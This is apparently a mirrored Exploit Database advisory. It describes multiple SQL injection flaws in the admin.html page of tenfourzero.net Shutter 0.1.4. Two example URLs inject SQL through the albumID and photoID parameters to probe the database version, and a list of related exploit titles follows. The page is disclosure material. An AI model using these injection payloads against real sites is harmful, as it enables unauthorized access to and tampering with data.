tenfourzero.net Shutter 0.1.4 – ‘admin.html’ Multiple SQL Injections

Exploit Database
11 阅读

作者： blake

日期： 2010-03-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33773/

source: https://www.securityfocus.com/bid/38849/info

tenfourzero.net's Shutter is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Shutter 0.1.4 is vulnerable; other versions may also be affected. 

http://www.example.com/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://www.example.com/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5

last Exploits
tenfourzero.net Shutter 0.1.4 – ‘admin.html’ Multiple SQL Injections的更多信息

Online Shopping Portal 3.1 – Authentication Bypass：
OpenEMR 4.1.0 – ‘u’ SQL Injection：
WordPress Plugin VideoWhisper 4.27.3 – Multiple Vulnerabilities：
Oracle GlassFish Server 3.1.1 (build 12) – Multiple Cross-Site Scripting Vulnerabilities：
Real Estate MLM plan script 1.0 – ‘srch’ SQL Injection：
WordPress Plugin WP Publication Archive 2.0.1 – ‘file’ Information Disclosure：
Home of Viral Images, Videos and Articles Script – SQL Injection：
Elite Gaming Ladders 3.5 – ‘ladder[id]’ SQL Injection：